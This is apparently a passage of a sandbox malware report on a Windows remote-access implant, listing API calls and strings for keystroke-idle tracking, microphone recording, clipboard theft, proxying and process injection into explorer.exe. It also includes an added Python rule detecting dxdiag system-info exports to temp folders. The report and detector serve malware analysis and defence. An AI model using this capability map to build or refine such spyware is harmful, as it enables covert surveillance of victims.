                                    • Opcode ID: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                    • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                                    • Opcode Fuzzy Hash: f361c4fdd0f35bb0b590f5a399794b5d5c57f6d7c3c5bbd0b76040d27d65b4a3
                                    • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 65535$udp
                                    • API String ID: 0-1267037602
                                    • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                    • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                    • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                    • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0040AD73
                                    • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                    • GetForegroundWindow.USER32 ref: 0040AD84
                                    • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                    • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                    • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                      • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                    • String ID: [${ User has been idle for $ minutes }$]
                                    • API String ID: 911427763-3954389425
                                    • Opcode ID: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                    • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                    • Opcode Fuzzy Hash: a9d80c92317e710bb0ee7b8060ee11baa7f71990c7fa4e3373d3f7fac537cda3
                                    • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                    APIs
                                    • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040DBD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-425784914
                                    • Opcode ID: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                    • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                    • Opcode Fuzzy Hash: 9fc837d8cdd91ddad254a0e7a0cf26b33e0d7c4ac323512d933d46fc1d77c410
                                    • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                    • __dosmaperr.LIBCMT ref: 0043A926
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                    • __dosmaperr.LIBCMT ref: 0043A963
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                    • __dosmaperr.LIBCMT ref: 0043A9B7
                                    • _free.LIBCMT ref: 0043A9C3
                                    • _free.LIBCMT ref: 0043A9CA
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                    • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                    • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                    • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                    • TranslateMessage.USER32(?), ref: 0040557E
                                    • DispatchMessageA.USER32(?), ref: 00405589
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                    • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                    • Opcode Fuzzy Hash: 92a42e6f76523c23ad071d277faa5832b5c30b25a00b0af7c670b91f71b4b998
                                    • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                    APIs
                                      • Part of subcall function 00417F67: __EH_prolog.LIBCMT ref: 00417F6C
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660B4), ref: 00417E17
                                    • CloseHandle.KERNEL32(00000000), ref: 00417E20
                                    • DeleteFileA.KERNEL32(00000000), ref: 00417E2F
                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DE3
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                    • String ID: 0VG$0VG$<$@$Temp
                                    • API String ID: 1704390241-2575729100
                                    • Opcode ID: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                    • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                    • Opcode Fuzzy Hash: 770267ec3d45abc508c60553e0d69256dfd3bd3466962ea0f4637c0737b4c84d
                                    • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                    APIs
                                    • OpenClipboard.USER32 ref: 0041697C
                                    • EmptyClipboard.USER32 ref: 0041698A
                                    • CloseClipboard.USER32 ref: 00416990
                                    • OpenClipboard.USER32 ref: 00416997
                                    • GetClipboardData.USER32(0000000D), ref: 004169A7
                                    • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                    • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                    • CloseClipboard.USER32 ref: 004169BF
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: !D@
                                    • API String ID: 2172192267-604454484
                                    • Opcode ID: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                    • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                    • Opcode Fuzzy Hash: da78ba80ec0729aaebbd7618c01a60a0d67124b513bef4f543176b1e835a0158
                                    • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                                    • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                                    • CloseHandle.KERNEL32(00000000), ref: 0041349A
                                    • CloseHandle.KERNEL32(?), ref: 004134A0
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                    • String ID:
                                    • API String ID: 297527592-0
                                    • Opcode ID: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                    • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                                    • Opcode Fuzzy Hash: 574f29b59094fb47ce71c879203f8806fd1a71798bcc0508934a1059045681f6
                                    • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                    • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                    APIs
                                    • _free.LIBCMT ref: 004481B5
                                      • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                      • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                    • _free.LIBCMT ref: 004481C1
                                    • _free.LIBCMT ref: 004481CC
                                    • _free.LIBCMT ref: 004481D7
                                    • _free.LIBCMT ref: 004481E2
                                    • _free.LIBCMT ref: 004481ED
                                    • _free.LIBCMT ref: 004481F8
                                    • _free.LIBCMT ref: 00448203
                                    • _free.LIBCMT ref: 0044820E
                                    • _free.LIBCMT ref: 0044821C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                    • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                    • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                    • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                    • API String ID: 3578746661-3604713145
                                    • Opcode ID: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                    • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                    • Opcode Fuzzy Hash: a7da0e03d27dfd4f061563b37853281ba9d59ca7803a508e71efe6cf15854c11
                                    • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                    APIs
                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                    • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                    • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                    • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                    • __fassign.LIBCMT ref: 0044B4F9
                                    • __fassign.LIBCMT ref: 0044B514
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B559
                                    • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BBB1,?), ref: 0044B592
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID: PkGNG
                                    • API String ID: 1324828854-263838557
                                    • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                    • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                    • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                    • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                      • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                    • Sleep.KERNEL32(00000064), ref: 0041755C
                                    • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleep
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 1462127192-2001430897
                                    • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                    • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                    • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                    • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
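The record above is the implant's system-profiling step: ShellExecuteW("open", "dxdiag") assembled from the strings "/t ", "\sysinfo.txt" and "temp", a 100 ms Sleep (0x64), a CreateFileW read of the result and a DeleteFileW. dxdiag's /t switch writes a DirectX diagnostics report to a file without showing a window, so on the endpoint the whole step collapses into one process-creation event. The checker below is an added example, not part of the Joe Sandbox report and not Remcos code: it flags dxdiag.exe exporting into a temp directory and raises severity when the parent image lives directly under AppData\Roaming, where this report's dropped copy (keHuNxIumw.exe, see the GetCurrentProcess record below) sits. The Sysmon-style field names (Image, CommandLine, ParentImage), the sample events and the parent allowlist are assumptions of the example; legitimate support tooling also runs dxdiag /t, so the allowlist and the parent context in the alert are what keep it usable.

```python
r"""Endpoint detection for a dxdiag text export into a temp directory.

Added example, not from the Joe Sandbox report or from Remcos. Event fields
follow Sysmon Event ID 1 naming (Image, CommandLine, ParentImage); the
sample events are constructed.
"""
import re
from pathlib import PureWindowsPath

# "/t <file>" is dxdiag's silent text-export switch; capture the target file
# whether or not it is quoted.
OUTFILE_RE = re.compile(r'(?i)\s/t\s+(?:"([^"]+)"|(\S+))')


def in_temp_dir(path):
    p = path.lower()
    return "\\temp\\" in p or "\\tmp\\" in p or p.startswith("%temp%")


def dropped_location(image):
    """True when the image sits directly in %AppData%\\Roaming or in a temp
    directory, as the persistence copy in this report does (assumption:
    that placement is unusual for legitimate parents of dxdiag)."""
    parent_dir = str(PureWindowsPath(image).parent).lower()
    return parent_dir.endswith("\\appdata\\roaming") or in_temp_dir(image)


def detect_dxdiag_export(event, allowed_parents=frozenset()):
    """Return an alert dict for a dxdiag export into a temp directory, or
    None. `allowed_parents` holds lower-case parent image names that are
    expected to run dxdiag /t in the environment (assumed allowlist)."""
    if PureWindowsPath(event.get("Image", "")).name.lower() != "dxdiag.exe":
        return None
    m = OUTFILE_RE.search(event.get("CommandLine", ""))
    if not m:
        return None                     # interactive dxdiag, nothing exported
    outfile = m.group(1) or m.group(2)
    if not in_temp_dir(outfile):
        return None                     # user-chosen location, e.g. Desktop
    parent = event.get("ParentImage", "")
    if PureWindowsPath(parent).name.lower() in allowed_parents:
        return None
    return {
        "rule": "dxdiag_sysinfo_export_to_temp",
        "outfile": outfile,
        "parent": parent,
        "severity": "high" if dropped_location(parent) else "medium",
    }


def scan(events, allowed_parents=frozenset()):
    return [hit for e in events if (hit := detect_dxdiag_export(e, allowed_parents))]


# Constructed sample telemetry; the parent path of the first event copies the
# dropped-file path printed in this report.
SAMPLE_EVENTS = [
    {  # what the record above produces on the host
        "Image": r"C:\Windows\System32\dxdiag.exe",
        "CommandLine": r'"C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt',
        "ParentImage": r"C:\Users\user\AppData\Roaming\keHuNxIumw.exe",
    },
    {  # interactive dxdiag launched by the user, no export
        "Image": r"C:\Windows\System32\dxdiag.exe",
        "CommandLine": r'"C:\Windows\System32\dxdiag.exe"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {  # user export to the Desktop, not a temp directory
        "Image": r"C:\Windows\System32\dxdiag.exe",
        "CommandLine": r'"C:\Windows\System32\dxdiag.exe" /t "C:\Users\user\Desktop\DxDiag.txt"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

Only the first sample event fires, at high severity because its parent runs from the root of AppData\Roaming; the same event is suppressed once its parent name is allowlisted. Pair the rule with the file's short lifetime (the implant deletes sysinfo.txt right after reading it), which a file-create event for a temp-directory sysinfo.txt followed by a delete can corroborate.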
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\AppData\Roaming\keHuNxIumw.exe), ref: 004074D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                    • API String ID: 2050909247-4242073005
                                    • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                    • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                    • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                    • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                    APIs
                                    • _strftime.LIBCMT ref: 00401D50
                                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                    • API String ID: 3809562944-243156785
                                    • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                    • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                    • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                    • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                    • int.LIBCPMT ref: 00410EBC
                                      • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                      • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                    • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                    • __Init_thread_footer.LIBCMT ref: 00410F64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                    • String ID: ,kG$0kG
                                    • API String ID: 3815856325-2015055088
                                    • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                    • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                    • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                    • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                    • waveInStart.WINMM ref: 00401CFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID: dMG$|MG$PG
                                    • API String ID: 1356121797-532278878
                                    • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                    • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                    • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                    • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                      • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                      • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                      • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
